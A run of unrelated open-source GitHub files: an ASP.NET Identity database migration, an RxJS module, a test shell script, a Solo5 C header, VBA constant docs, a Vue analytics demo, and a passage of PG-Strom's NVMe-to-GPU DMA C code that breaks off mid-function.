using System; using Microsoft.EntityFrameworkCore.Migrations; namespace Spark.Web.Migrations { public partial class Init : Migration { protected override void Up(MigrationBuilder migrationBuilder) { migrationBuilder.CreateTable( name: "AspNetRoles", columns: table => new { Id = table.Column<string>(nullable: false), Name = table.Column<string>(maxLength: 256, nullable: true), NormalizedName = table.Column<string>(maxLength: 256, nullable: true), ConcurrencyStamp = table.Column<string>(nullable: true) }, constraints: table => { table.PrimaryKey("PK_AspNetRoles", x => x.Id); }); migrationBuilder.CreateTable( name: "AspNetUsers", columns: table => new { Id = table.Column<string>(nullable: false), UserName = table.Column<string>(maxLength: 256, nullable: true), NormalizedUserName = table.Column<string>(maxLength: 256, nullable: true), Email = table.Column<string>(maxLength: 256, nullable: true), NormalizedEmail = table.Column<string>(maxLength: 256, nullable: true), EmailConfirmed = table.Column<bool>(nullable: false), PasswordHash = table.Column<string>(nullable: true), SecurityStamp = table.Column<string>(nullable: true), ConcurrencyStamp = table.Column<string>(nullable: true), PhoneNumber = table.Column<string>(nullable: true), PhoneNumberConfirmed = table.Column<bool>(nullable: false), TwoFactorEnabled = table.Column<bool>(nullable: false), LockoutEnd = table.Column<DateTimeOffset>(nullable: true), LockoutEnabled = table.Column<bool>(nullable: false), AccessFailedCount = table.Column<int>(nullable: false) }, constraints: table => { table.PrimaryKey("PK_AspNetUsers", x => x.Id); }); migrationBuilder.CreateTable( name: "AspNetRoleClaims", columns: table => new { Id = table.Column<int>(nullable: false) .Annotation("Sqlite:Autoincrement", true), RoleId = table.Column<string>(nullable: false), ClaimType = table.Column<string>(nullable: true), ClaimValue = table.Column<string>(nullable: true) }, constraints: table => { table.PrimaryKey("PK_AspNetRoleClaims", x => x.Id); table.ForeignKey( name: "FK_AspNetRoleClaims_AspNetRoles_RoleId", column: x => x.RoleId, principalTable: "AspNetRoles", principalColumn: "Id", onDelete: ReferentialAction.Cascade); }); migrationBuilder.CreateTable( name: "AspNetUserClaims", columns: table => new { Id = table.Column<int>(nullable: false) .Annotation("Sqlite:Autoincrement", true), UserId = table.Column<string>(nullable: false), ClaimType = table.Column<string>(nullable: true), ClaimValue = table.Column<string>(nullable: true) }, constraints: table => { table.PrimaryKey("PK_AspNetUserClaims", x => x.Id); table.ForeignKey( name: "FK_AspNetUserClaims_AspNetUsers_UserId", column: x => x.UserId, principalTable: "AspNetUsers", principalColumn: "Id", onDelete: ReferentialAction.Cascade); }); migrationBuilder.CreateTable( name: "AspNetUserLogins", columns: table => new { LoginProvider = table.Column<string>(maxLength: 128, nullable: false), ProviderKey = table.Column<string>(maxLength: 128, nullable: false), ProviderDisplayName = table.Column<string>(nullable: true), UserId = table.Column<string>(nullable: false) }, constraints: table => { table.PrimaryKey("PK_AspNetUserLogins", x => new { x.LoginProvider, x.ProviderKey }); table.ForeignKey( name: "FK_AspNetUserLogins_AspNetUsers_UserId", column: x => x.UserId, principalTable: "AspNetUsers", principalColumn: "Id", onDelete: ReferentialAction.Cascade); }); migrationBuilder.CreateTable( name: "AspNetUserRoles", columns: table => new { UserId = table.Column<string>(nullable: false), RoleId = table.Column<string>(nullable: 
false) }, constraints: table => { table.PrimaryKey("PK_AspNetUserRoles", x => new { x.UserId, x.RoleId }); table.ForeignKey( name: "FK_AspNetUserRoles_AspNetRoles_RoleId", column: x => x.RoleId, principalTable: "AspNetRoles", principalColumn: "Id", onDelete: ReferentialAction.Cascade); table.ForeignKey( name: "FK_AspNetUserRoles_AspNetUsers_UserId", column: x => x.UserId, principalTable: "AspNetUsers", principalColumn: "Id", onDelete: ReferentialAction.Cascade); }); migrationBuilder.CreateTable( name: "AspNetUserTokens", columns: table => new { UserId = table.Column<string>(nullable: false), LoginProvider = table.Column<string>(maxLength: 128, nullable: false), Name = table.Column<string>(maxLength: 128, nullable: false), Value = table.Column<string>(nullable: true) }, constraints: table => { table.PrimaryKey("PK_AspNetUserTokens", x => new { x.UserId, x.LoginProvider, x.Name }); table.ForeignKey( name: "FK_AspNetUserTokens_AspNetUsers_UserId", column: x => x.UserId, principalTable: "AspNetUsers", principalColumn: "Id", onDelete: ReferentialAction.Cascade); }); migrationBuilder.InsertData( table: "AspNetRoles", columns: new[] { "Id", "ConcurrencyStamp", "Name", "NormalizedName" }, values: new object[] { "453e564a-29b5-4f1f-b49b-1bd116778fce", "38c23849-bc6b-451e-bba0-c817703d3168", "Admin", "ADMIN" }); migrationBuilder.CreateIndex( name: "IX_AspNetRoleClaims_RoleId", table: "AspNetRoleClaims", column: "RoleId"); migrationBuilder.CreateIndex( name: "RoleNameIndex", table: "AspNetRoles", column: "NormalizedName", unique: true); migrationBuilder.CreateIndex( name: "IX_AspNetUserClaims_UserId", table: "AspNetUserClaims", column: "UserId"); migrationBuilder.CreateIndex( name: "IX_AspNetUserLogins_UserId", table: "AspNetUserLogins", column: "UserId"); migrationBuilder.CreateIndex( name: "IX_AspNetUserRoles_RoleId", table: "AspNetUserRoles", column: "RoleId"); migrationBuilder.CreateIndex( name: "EmailIndex", table: "AspNetUsers", column: "NormalizedEmail"); migrationBuilder.CreateIndex( name: "UserNameIndex", table: "AspNetUsers", column: "NormalizedUserName", unique: true); } protected override void Down(MigrationBuilder migrationBuilder) { migrationBuilder.DropTable( name: "AspNetRoleClaims"); migrationBuilder.DropTable( name: "AspNetUserClaims"); migrationBuilder.DropTable( name: "AspNetUserLogins"); migrationBuilder.DropTable( name: "AspNetUserRoles"); migrationBuilder.DropTable( name: "AspNetUserTokens"); migrationBuilder.DropTable( name: "AspNetRoles"); migrationBuilder.DropTable( name: "AspNetUsers"); } } }
{ "pile_set_name": "Github" }
/** PURE_IMPORTS_START PURE_IMPORTS_END */ export var rxSubscriber = /*@__PURE__*/ (function () { return typeof Symbol === 'function' ? /*@__PURE__*/ Symbol('rxSubscriber') : '@@rxSubscriber_' + /*@__PURE__*/ Math.random(); })(); export var $$rxSubscriber = rxSubscriber; //# sourceMappingURL=rxSubscriber.js.map
{ "pile_set_name": "Github" }
#!/bin/bash -ex DIR=$(dirname "$0") cp "$DIR/../../version.json" "$DIR/../config" yarn workspaces focus fxa-profile-server yarn test
{ "pile_set_name": "Github" }
/* * Copyright (c) 2017 Contributors as noted in the AUTHORS file * * This file is part of Solo5, a sandboxed execution environment. * * Permission to use, copy, modify, and/or distribute this software * for any purpose with or without fee is hereby granted, provided * that the above copyright notice and this permission notice appear * in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL * WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE * AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR * CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS * OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, * NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN * CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #ifndef MUEN_CHANNEL_READER_H #define MUEN_CHANNEL_READER_H #include "channel.h" enum muchannel_reader_result { MUCHANNEL_INACTIVE, MUCHANNEL_INCOMPATIBLE_INTERFACE, MUCHANNEL_EPOCH_CHANGED, MUCHANNEL_NO_DATA, MUCHANNEL_OVERRUN_DETECTED, MUCHANNEL_SUCCESS }; struct muchannel_reader { uint64_t epoch; uint64_t protocol; uint64_t size; uint64_t elements; uint64_t rc; }; /* * Initialize reader with given protocol. */ void muen_channel_init_reader(struct muchannel_reader *reader, uint64_t protocol); /* * Read next element from given channel. */ enum muchannel_reader_result muen_channel_read( const struct muchannel * const channel, struct muchannel_reader *reader, void *element); /* * Drain all current channel elements. */ void muen_channel_drain(const struct muchannel * const channel, struct muchannel_reader *reader); /* * Returns True if there is pending data in the channel. */ bool muen_channel_has_pending_data(const struct muchannel * const channel, struct muchannel_reader *reader); #endif
{ "pile_set_name": "Github" }
--- title: QueryClose Constants keywords: vblr6.chm1106127 f1_keywords: - vblr6.chm1106127 ms.prod: office ms.assetid: 0e7ca25d-316c-53bb-4213-1b0c8d529de4 ms.date: 06/08/2017 --- # QueryClose Constants The following [constants](vbe-glossary.md) can be used anywhere in your code in place of the actual values: |**Constant**|**Value**|**Description**| |:-----|:-----|:-----| |**vbFormControlMenu**|0|The user chose the **Close** command from the **Control** menu on the form.| |**vbFormCode**|1|The **Unload** statement is invoked from code.| |**vbAppWindows**|2|The current Microsoft Windows operating environment session is ending.| |**vbAppTaskManager**|3|The Windows **Task Manager** is closing the application.|
{ "pile_set_name": "Github" }
import Vue from 'vue/dist/vue.js'
import VueMultianalytics from '../dist/vue-multianalytics.min'
import analyticsMixin from './analytics-mixin'

let gaConfig = {
  appName: 'Test', // Mandatory
  appVersion: '0.1', // Mandatory
  trackingId: 'UA-96678006-1', // Mandatory
  globalDimensions: [],
  globalMetrics: [],
  debug: true
}

let mixpanelConfig = {
  token: '933572e86a323c77cf71d8c2d376fc5e',
  config: {},
  debug: true
}

Vue.use(VueMultianalytics, {
  modules: {
    ga: gaConfig,
    mixpanel: mixpanelConfig
  }
}, analyticsMixin)

let template = `
  <div>
    <div>{{message}}</div>
    <button @click="trackView()">Track View</button>
    <button @click="trackEvent()">Track Event</button>
    <button @click="trackException()">Track Exception</button>
    <button @click="testMixin()">Test Mixin</button>
    <button @click="setUserProperties()">User properties</button>
    <button @click="setSuperProperties()">Super properties</button>
  </div>
`

const app = new Vue({
  el: '#app',
  template: template,
  data: {
    message: 'Hello MultiAnalytics'
  },
  mounted () {
    console.log(this.$ma)
  },
  methods: {
    trackEvent () {
      this.$ma.trackEvent({action: 'test category', category: 'clicks', properties: {interesting: true}, eventType: 2})
    },
    trackView () {
      this.$ma.trackView({viewName: 'test view'})
    },
    trackException () {
      this.$ma.trackException({description: 'test exception', isFatal: true})
    },
    testMixin () {
      this.$mam.test()
    },
    setUserProperties () {
      this.$ma.setUserProperties({userId: 'userTest', identityType: 3, platform: 'web'})
    },
    setSuperProperties () {
      this.$ma.setSuperProperties({platform: 'web'})
    },
    ecommerceTrackEvent () {
      let product = {
        name: 'product name',
        description: 'Product description',
        price: 100.56,
        quantity: 5
      }
      this.$ma.ecommerceTrackEvent({product, properties: {currency: 'USD'}})
    }
  }
})
{ "pile_set_name": "Github" }
/* * nvme_strom.c * * Routines to support optional SSD-to-GPU Direct DMA Loading * ---- * Copyright 2011-2017 (C) KaiGai Kohei <[email protected]> * Copyright 2014-2017 (C) The PG-Strom Development Team * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 as * published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. */ #include "postgres.h" #include "catalog/pg_type.h" #include "commands/tablespace.h" #include "funcapi.h" #include "storage/ipc.h" #include "storage/bufmgr.h" #include "utils/builtins.h" #include "utils/guc.h" #include "utils/inval.h" #include "utils/rel.h" #include "utils/syscache.h" #include "pg_strom.h" #include "nvme_strom.h" #include <sys/ioctl.h> #include <sys/stat.h> #include <sys/statvfs.h> #include <sys/types.h> #include <unistd.h> #define IOMAPBUF_CHUNKSZ_MAX_BIT 34 /* 16G */ #define IOMAPBUF_CHUNKSZ_MIN_BIT 12 /* 4KB */ #define IOMAPBUF_CHUNKSZ_MAX (1UL << IOMAPBUF_CHUNKSZ_MAX_BIT) #define IOMAPBUF_CHUNKSZ_MIN (1UL << IOMAPBUF_CHUNKSZ_MIN_BIT) typedef struct { dlist_node free_chain; /* zero, if active chunk */ cl_uint mclass; /* zero, if not chunk head */ } IOMapBufferChunk; typedef struct { CUipcMemHandle cuda_mhandle; unsigned long iomap_handle; uint32_t gpu_page_sz; uint32_t gpu_npages; /* fields below are protected by the lock */ slock_t lock; dlist_head free_chunks[IOMAPBUF_CHUNKSZ_MAX_BIT + 1]; IOMapBufferChunk iomap_chunks[FLEXIBLE_ARRAY_MEMBER]; } IOMapBufferSegment; static shmem_startup_hook_type shmem_startup_next = NULL; static const char *nvme_strom_ioctl_pathname = "/proc/nvme-strom"; static void *iomap_buffer_segments = NULL; static CUdeviceptr iomap_buffer_base = 0UL; /* per process vaddr */ static Size iomap_buffer_size; /* GUC */ static HTAB *vfs_nvme_htable = NULL; static Oid nvme_last_tablespace_oid = InvalidOid; static bool nvme_last_tablespace_supported; static bool debug_force_nvme_strom = false; /* GUC */ static bool nvme_strom_enabled = true; /* GUC */ static long sysconf_pagesize; /* _SC_PAGESIZE */ static long sysconf_phys_pages; /* _SC_PHYS_PAGES */ static long nvme_strom_threshold; #define SizeOfIOMapBufferSegment \ MAXALIGN(offsetof(IOMapBufferSegment, \ iomap_chunks[iomap_buffer_size >> \ IOMAPBUF_CHUNKSZ_MIN_BIT])) #define GetIOMapBufferSegment(dindex) \ ((IOMapBufferSegment *)((char *)iomap_buffer_segments + \ SizeOfIOMapBufferSegment * (dindex))) #if 0 /* * gpuMemSizeIOMap - returns configured size of the i/o mapped device memory; * never guaranteed it is actually allocated and mapped. 
*/ Size gpuMemSizeIOMap(void) { return iomap_buffer_size; } #endif /* * nvme_strom_ioctl */ static int nvme_strom_ioctl(int cmd, const void *arg) { static int fdesc_nvme_strom = -1; if (fdesc_nvme_strom < 0) { fdesc_nvme_strom = open(nvme_strom_ioctl_pathname, O_RDONLY); if (fdesc_nvme_strom < 0) elog(ERROR, "failed to open %s: %m", nvme_strom_ioctl_pathname); } return ioctl(fdesc_nvme_strom, cmd, arg); } #if 0 /* * gpuMemSplitIOMap */ static bool gpuMemSplitIOMap(IOMapBufferSegment *iomap_seg, int mclass) { IOMapBufferChunk *iomap_chunk_1; IOMapBufferChunk *iomap_chunk_2; dlist_node *dnode; int offset; if (mclass > IOMAPBUF_CHUNKSZ_MAX_BIT) return false; Assert(mclass > IOMAPBUF_CHUNKSZ_MIN_BIT); if (dlist_is_empty(&iomap_seg->free_chunks[mclass])) { if (!gpuMemSplitIOMap(iomap_seg, mclass + 1)) return false; } Assert(!dlist_is_empty(&iomap_seg->free_chunks[mclass])); offset = 1UL << (mclass - 1 - IOMAPBUF_CHUNKSZ_MIN_BIT); dnode = dlist_pop_head_node(&iomap_seg->free_chunks[mclass]); iomap_chunk_1 = dlist_container(IOMapBufferChunk, free_chain, dnode); iomap_chunk_2 = iomap_chunk_1 + offset; Assert(iomap_chunk_2->mclass == 0); iomap_chunk_1->mclass = mclass - 1; iomap_chunk_2->mclass = mclass - 1; dlist_push_tail(&iomap_seg->free_chunks[mclass - 1], &iomap_chunk_1->free_chain); dlist_push_tail(&iomap_seg->free_chunks[mclass - 1], &iomap_chunk_2->free_chain); return true; } /* * gpuMemAllocIOMap * * Allocation of device memory which is mapped to I/O address space */ CUresult gpuMemAllocIOMap(GpuContext *gcontext, CUdeviceptr *p_devptr, size_t bytesize) { IOMapBufferSegment *iomap_seg; IOMapBufferChunk *iomap_chunk; int mclass; int index; dlist_node *dnode; CUdeviceptr devptr; CUresult rc; static pthread_mutex_t iomap_buffer_mutex = PTHREAD_MUTEX_INITIALIZER; Assert(IsGpuServerProcess()); if (!iomap_buffer_segments) return CUDA_ERROR_OUT_OF_MEMORY; /* ensure the i/o mapped buffer is already available */ iomap_seg = GetIOMapBufferSegment(gpuserv_cuda_dindex); pg_memory_barrier(); if (!iomap_seg->iomap_handle) return CUDA_ERROR_OUT_OF_MEMORY; pthreadMutexLock(&iomap_buffer_mutex); if (!iomap_buffer_base) { rc = cuIpcOpenMemHandle(&iomap_buffer_base, iomap_seg->cuda_mhandle, CU_IPC_MEM_LAZY_ENABLE_PEER_ACCESS); if (rc != CUDA_SUCCESS) { pthreadMutexUnlock(&iomap_buffer_mutex); werror("failed on cuIpcOpenMemHandle: %s", errorText(rc)); } } pthreadMutexUnlock(&iomap_buffer_mutex); /* * Do allocation */ mclass = get_next_log2(bytesize); if (mclass < IOMAPBUF_CHUNKSZ_MIN_BIT) mclass = IOMAPBUF_CHUNKSZ_MIN_BIT; else if (mclass > IOMAPBUF_CHUNKSZ_MAX_BIT) return CUDA_ERROR_OUT_OF_MEMORY; SpinLockAcquire(&iomap_seg->lock); if (dlist_is_empty(&iomap_seg->free_chunks[mclass])) { /* split larger mclass */ if (!gpuMemSplitIOMap(iomap_seg, mclass + 1)) { SpinLockRelease(&iomap_seg->lock); return CUDA_ERROR_OUT_OF_MEMORY; } } Assert(!dlist_is_empty(&iomap_seg->free_chunks[mclass])); dnode = dlist_pop_head_node(&iomap_seg->free_chunks[mclass]); iomap_chunk = dlist_container(IOMapBufferChunk, free_chain, dnode); Assert(iomap_chunk->mclass == mclass); memset(&iomap_chunk->free_chain, 0, sizeof(dlist_node)); SpinLockRelease(&iomap_seg->lock); Assert(iomap_chunk >= iomap_seg->iomap_chunks); index = iomap_chunk - iomap_seg->iomap_chunks; Assert(index < iomap_buffer_size >> IOMAPBUF_CHUNKSZ_MIN_BIT); devptr = iomap_buffer_base + ((Size)index << IOMAPBUF_CHUNKSZ_MIN_BIT); trackIOMapMem(gcontext, devptr); Assert(devptr >= iomap_buffer_base && devptr + bytesize <= iomap_buffer_base + iomap_buffer_size); *p_devptr = 
devptr; return CUDA_SUCCESS; } /* * gpuMemFreeIOMap * * Release of device memory which is mapped to I/O address space */ CUresult gpuMemFreeIOMap(GpuContext *gcontext, CUdeviceptr devptr) { IOMapBufferSegment *iomap_seg; IOMapBufferChunk *iomap_chunk; IOMapBufferChunk *iomap_buddy; int index; int shift; /* If called on PostgreSQL backend, send a request to release */ if (!IsGpuServerProcess()) { gpuservSendIOMapMemFree(gcontext, devptr); return CUDA_SUCCESS; } if (gcontext) untrackIOMapMem(gcontext, devptr); if (!iomap_buffer_base) return CUDA_ERROR_NOT_INITIALIZED; /* ensure the i/o mapped buffer is already available */ iomap_seg = GetIOMapBufferSegment(gpuserv_cuda_dindex); pg_memory_barrier(); if (!iomap_seg->iomap_handle) return CUDA_ERROR_NOT_INITIALIZED; if (devptr < iomap_buffer_base || devptr > iomap_buffer_base + iomap_buffer_size) return CUDA_ERROR_INVALID_VALUE; SpinLockAcquire(&iomap_seg->lock); Assert((devptr & (IOMAPBUF_CHUNKSZ_MIN - 1)) == 0); index = (devptr - iomap_buffer_base) >> IOMAPBUF_CHUNKSZ_MIN_BIT; iomap_chunk = &iomap_seg->iomap_chunks[index]; Assert(!iomap_chunk->free_chain.prev && !iomap_chunk->free_chain.next); /* * Try to merge with the neighbor chunks */ while (iomap_chunk->mclass < IOMAPBUF_CHUNKSZ_MAX_BIT) { index = iomap_chunk - iomap_seg->iomap_chunks; shift = 1UL << (iomap_chunk->mclass - IOMAPBUF_CHUNKSZ_MIN_BIT); Assert((index & (shift - 1)) == 0); if ((index & shift) == 0) { /* try to merge with next */ iomap_buddy = &iomap_seg->iomap_chunks[index + shift]; if (iomap_buddy->free_chain.prev && iomap_buddy->free_chain.next && iomap_buddy->mclass == iomap_chunk->mclass) { /* OK, let's merge */ dlist_delete(&iomap_buddy->free_chain); memset(iomap_buddy, 0, sizeof(IOMapBufferChunk)); iomap_chunk->mclass++; } else break; /* give up to merge chunks any more */ } else { /* try to merge with prev */ iomap_buddy = &iomap_seg->iomap_chunks[index - shift]; if (iomap_buddy->free_chain.prev && iomap_buddy->free_chain.next && iomap_buddy->mclass == iomap_chunk->mclass) { /* OK, let's merge */ dlist_delete(&iomap_buddy->free_chain); memset(&iomap_buddy->free_chain, 0, sizeof(dlist_node)); memset(iomap_chunk, 0, sizeof(IOMapBufferChunk)); iomap_buddy->mclass++; iomap_chunk = iomap_buddy; } else break; /* give up to merge chunks any more */ } } /* back to the free list again */ Assert(iomap_chunk->mclass >= IOMAPBUF_CHUNKSZ_MIN_BIT && iomap_chunk->mclass <= IOMAPBUF_CHUNKSZ_MAX_BIT); dlist_push_head(&iomap_seg->free_chunks[iomap_chunk->mclass], &iomap_chunk->free_chain); SpinLockRelease(&iomap_seg->lock); return CUDA_SUCCESS; } #endif /* * gpuMemCopyFromSSDWaitRaw */ static void gpuMemCopyFromSSDWaitRaw(unsigned long dma_task_id) { StromCmd__MemCopyWait cmd; memset(&cmd, 0, sizeof(StromCmd__MemCopyWait)); cmd.dma_task_id = dma_task_id; if (nvme_strom_ioctl(STROM_IOCTL__MEMCPY_WAIT, &cmd) != 0) werror("failed on nvme_strom_ioctl(STROM_IOCTL__MEMCPY_WAIT): %m"); } /* * gpuMemCopyFromSSD - kick SSD-to-GPU Direct DMA, then wait for completion */ void gpuMemCopyFromSSD(GpuTask *gtask, CUdeviceptr m_kds, pgstrom_data_store *pds) { StromCmd__MemCopySsdToGpu cmd; IOMapBufferSegment *iomap_seg; BlockNumber *block_nums; void *block_data; size_t offset; size_t length; cl_uint nr_loaded; CUresult rc; Assert(IsGpuServerProcess()); if (!iomap_buffer_segments) werror("NVMe-Strom is not configured"); /* ensure the i/o mapped buffer is already available */ iomap_seg = GetIOMapBufferSegment(gpuserv_cuda_dindex); pg_memory_barrier(); if (!iomap_seg->iomap_handle) werror("NVMe-Strom is 
not initialized yet"); /* Device memory should be already imported on allocation time */ Assert(iomap_buffer_base != 0UL); /* PDS/KDS format check */ Assert(pds->kds.format == KDS_FORMAT_BLOCK); if (m_kds < iomap_buffer_base || m_kds + pds->kds.length > iomap_buffer_base + iomap_buffer_size) werror("NVMe-Strom: P2P DMA destination out of range"); offset = m_kds - iomap_buffer_base; /* nothing special if all the blocks are already loaded */ if (pds->nblocks_uncached == 0) { rc = cuMemcpyHtoDAsync(m_kds, &pds->kds, pds->kds.length, CU_STREAM_PER_THREAD); if (rc != CUDA_SUCCESS) werror("failed on cuMemcpyHtoDAsync: %s", errorText(rc)); return; } Assert(pds->nblocks_uncached <= pds->kds.nitems); nr_loaded = pds->kds.nitems - pds->nblocks_uncached; length = ((char *)KERN_DATA_STORE_BLOCK_PGPAGE(&pds->kds, nr_loaded) - (char *)(&pds->kds)); offset += length; /* userspace pointers */ block_nums = (BlockNumber *)KERN_DATA_STORE_BODY(&pds->kds) + nr_loaded; block_data = KERN_DATA_STORE_BLOCK_PGPAGE(&pds->kds, nr_loaded); /* setup ioctl(2) command */ memset(&cmd, 0, sizeof(StromCmd__MemCopySsdToGpu)); cmd.handle = iomap_seg->iomap_handle; cmd.offset = offset; cmd.file_desc = gtask->file_desc; cmd.nr_chunks = pds->nblocks_uncached; cmd.chunk_sz = BLCKSZ; cmd.relseg_sz = RELSEG_SIZE; cmd.chunk_ids = block_nums; cmd.wb_buffer = block_data; /* (1) kick SSD2GPU P2P DMA */ if (nvme_strom_ioctl(STROM_IOCTL__MEMCPY_SSD2GPU, &cmd) != 0) abort(); //werror("failed on STROM_IOCTL__MEMCPY_SSD2GPU: %m"); /* (2) kick RAM2GPU DMA (earlier half) */ rc = cuMemcpyHtoDAsync(m_kds, &pds->kds, length, CU_STREAM_PER_THREAD); if (rc != CUDA_SUCCESS) { gpuMemCopyFromSSDWaitRaw(cmd.dma_task_id); werror("failed on cuMemcpyHtoDAsync: %s", errorText(rc)); } /* (3) kick RAM2GPU DMA (later half; if any) */ if (cmd.nr_ram2gpu > 0) { length = BLCKSZ * cmd.nr_ram2gpu; offset = ((char *)KERN_DATA_STORE_BLOCK_PGPAGE(&pds->kds, pds->kds.nitems) - (char *)&pds->kds) - length; rc = cuMemcpyHtoDAsync(m_kds + offset, (char *)&pds->kds + offset, length, CU_STREAM_PER_THREAD); if (rc != CUDA_SUCCESS) { gpuMemCopyFromSSDWaitRaw(cmd.dma_task_id); werror("failed on cuMemcpyHtoDAsync: %s", errorText(rc)); } } /* (4) wait for completion of SSD2GPU P2P DMA */ gpuMemCopyFromSSDWaitRaw(cmd.dma_task_id); } /* * TablespaceCanUseNvmeStrom */ typedef struct { Oid tablespace_oid; bool nvme_strom_supported; } vfs_nvme_status; static void vfs_nvme_cache_callback(Datum arg, int cacheid, uint32 hashvalue) { /* invalidate all the cached status */ if (vfs_nvme_htable) { hash_destroy(vfs_nvme_htable); vfs_nvme_htable = NULL; nvme_last_tablespace_oid = InvalidOid; } } static bool TablespaceCanUseNvmeStrom(Oid tablespace_oid) { vfs_nvme_status *entry; const char *pathname; int fdesc; bool found; if (iomap_buffer_size == 0 || !nvme_strom_enabled) return false; /* NVMe-Strom is not configured or enabled */ if (!OidIsValid(tablespace_oid)) tablespace_oid = MyDatabaseTableSpace; /* quick lookup but sufficient for more than 99.99% cases */ if (OidIsValid(nvme_last_tablespace_oid) && nvme_last_tablespace_oid == tablespace_oid) return nvme_last_tablespace_supported; if (!vfs_nvme_htable) { HASHCTL ctl; memset(&ctl, 0, sizeof(HASHCTL)); ctl.keysize = sizeof(Oid); ctl.entrysize = sizeof(vfs_nvme_status); vfs_nvme_htable = hash_create("VFS:NVMe-Strom status", 64, &ctl, HASH_ELEM | HASH_BLOBS); CacheRegisterSyscacheCallback(TABLESPACEOID, vfs_nvme_cache_callback, (Datum) 0); } entry = (vfs_nvme_status *) hash_search(vfs_nvme_htable, &tablespace_oid, HASH_ENTER, &found); if 
(found) { nvme_last_tablespace_oid = tablespace_oid; nvme_last_tablespace_supported = entry->nvme_strom_supported; return entry->nvme_strom_supported; } /* check whether the tablespace is supported */ entry->tablespace_oid = tablespace_oid; entry->nvme_strom_supported = false; pathname = GetDatabasePath(MyDatabaseId, tablespace_oid); fdesc = open(pathname, O_RDONLY | O_DIRECTORY); if (fdesc < 0) { elog(WARNING, "failed to open \"%s\" of tablespace \"%s\": %m", pathname, get_tablespace_name(tablespace_oid)); } else { StromCmd__CheckFile cmd; cmd.fdesc = fdesc; if (nvme_strom_ioctl(STROM_IOCTL__CHECK_FILE, &cmd) == 0) entry->nvme_strom_supported = true; else { ereport(NOTICE, (errcode(ERRCODE_FEATURE_NOT_SUPPORTED), errmsg("nvme_strom does not support tablespace \"%s\"", get_tablespace_name(tablespace_oid)))); } } nvme_last_tablespace_oid = tablespace_oid; nvme_last_tablespace_supported = entry->nvme_strom_supported; return entry->nvme_strom_supported; } bool RelationCanUseNvmeStrom(Relation relation) { Oid tablespace_oid = RelationGetForm(relation)->reltablespace; /* SSD2GPU on temp relation is not supported */ if (RelationUsesLocalBuffers(relation)) return false; return TablespaceCanUseNvmeStrom(tablespace_oid); } /* * RelationWillUseNvmeStrom */ bool RelationWillUseNvmeStrom(Relation relation, BlockNumber *p_nr_blocks) { BlockNumber nr_blocks; /* at least, storage must support NVMe-Strom */ if (!RelationCanUseNvmeStrom(relation)) return false; /* * NOTE: RelationGetNumberOfBlocks() has a significant but helpful * side-effect. It opens all the underlying files of MAIN_FORKNUM, * then set @rd_smgr of the relation. * It allows extension to touch file descriptors without invocation of * ReadBuffer(). */ nr_blocks = RelationGetNumberOfBlocks(relation); if (!debug_force_nvme_strom && nr_blocks < nvme_strom_threshold) return false; /* * ok, it looks to me NVMe-Strom is supported, and relation size is * reasonably large to run with SSD-to-GPU Direct mode. */ if (p_nr_blocks) *p_nr_blocks = nr_blocks; return true; } /* * ScanPathWillUseNvmeStrom - Optimizer Hint */ bool ScanPathWillUseNvmeStrom(PlannerInfo *root, RelOptInfo *baserel) { RangeTblEntry *rte; HeapTuple tuple; bool relpersistence; if (!TablespaceCanUseNvmeStrom(baserel->reltablespace)) return false; /* unable to apply NVMe-Strom on temporay tables */ rte = root->simple_rte_array[baserel->relid]; tuple = SearchSysCache1(RELOID, ObjectIdGetDatum(rte->relid)); if (!HeapTupleIsValid(tuple)) elog(ERROR, "cache lookup failed for relation %u", rte->relid); relpersistence = ((Form_pg_class) GETSTRUCT(tuple))->relpersistence; ReleaseSysCache(tuple); if (relpersistence != RELPERSISTENCE_PERMANENT && relpersistence != RELPERSISTENCE_UNLOGGED) return false; /* Is number of blocks sufficient to NVMe-Strom? 
*/ if (!debug_force_nvme_strom && baserel->pages < nvme_strom_threshold) return false; /* ok, this table scan can use nvme-strom */ return true; } /* * pgstrom_iomap_buffer_info */ typedef struct { cl_uint nitems; struct { cl_int gpuid; cl_bool is_used; cl_ulong offset; cl_ulong length; } chunks[FLEXIBLE_ARRAY_MEMBER]; } iomap_buffer_info; static void setup_iomap_buffer_info(IOMapBufferSegment *iomap_seg, int gpuid, iomap_buffer_info *iomap_info) { int limit = iomap_buffer_size / IOMAPBUF_CHUNKSZ_MIN; int index = 0; SpinLockAcquire(&iomap_seg->lock); while (index < limit) { IOMapBufferChunk *iomap_chunk = &iomap_seg->iomap_chunks[index]; int j = iomap_info->nitems++; iomap_info->chunks[j].gpuid = gpuid; iomap_info->chunks[j].is_used = (!iomap_chunk->free_chain.prev && !iomap_chunk->free_chain.next); iomap_info->chunks[j].offset = index * IOMAPBUF_CHUNKSZ_MIN; iomap_info->chunks[j].length = (1UL << iomap_chunk->mclass); index += 1UL << (iomap_chunk->mclass - IOMAPBUF_CHUNKSZ_MIN_BIT); } SpinLockRelease(&iomap_seg->lock); } #if 1 void dump_iomap_buffer_info(void) { iomap_buffer_info *iomap_info; int i, max_nchunks; max_nchunks = iomap_buffer_size / IOMAPBUF_CHUNKSZ_MIN; iomap_info = palloc(offsetof(iomap_buffer_info, chunks[max_nchunks * numDevAttrs])); iomap_info->nitems = 0; if (iomap_buffer_segments) { for (i=0; i < numDevAttrs; i++) { IOMapBufferSegment *iomap_seg = GetIOMapBufferSegment(i); cl_int gpuid = devAttrs[i].DEV_ID; setup_iomap_buffer_info(iomap_seg, gpuid, iomap_info); } if (iomap_info->nitems > 0) fputc('\n', stderr); for (i=0; i < iomap_info->nitems; i++) { fprintf(stderr, "GPU%d 0x%p - 0x%p len=%zu %s\n", iomap_info->chunks[i].gpuid, (char *)(iomap_info->chunks[i].offset), (char *)(iomap_info->chunks[i].offset + 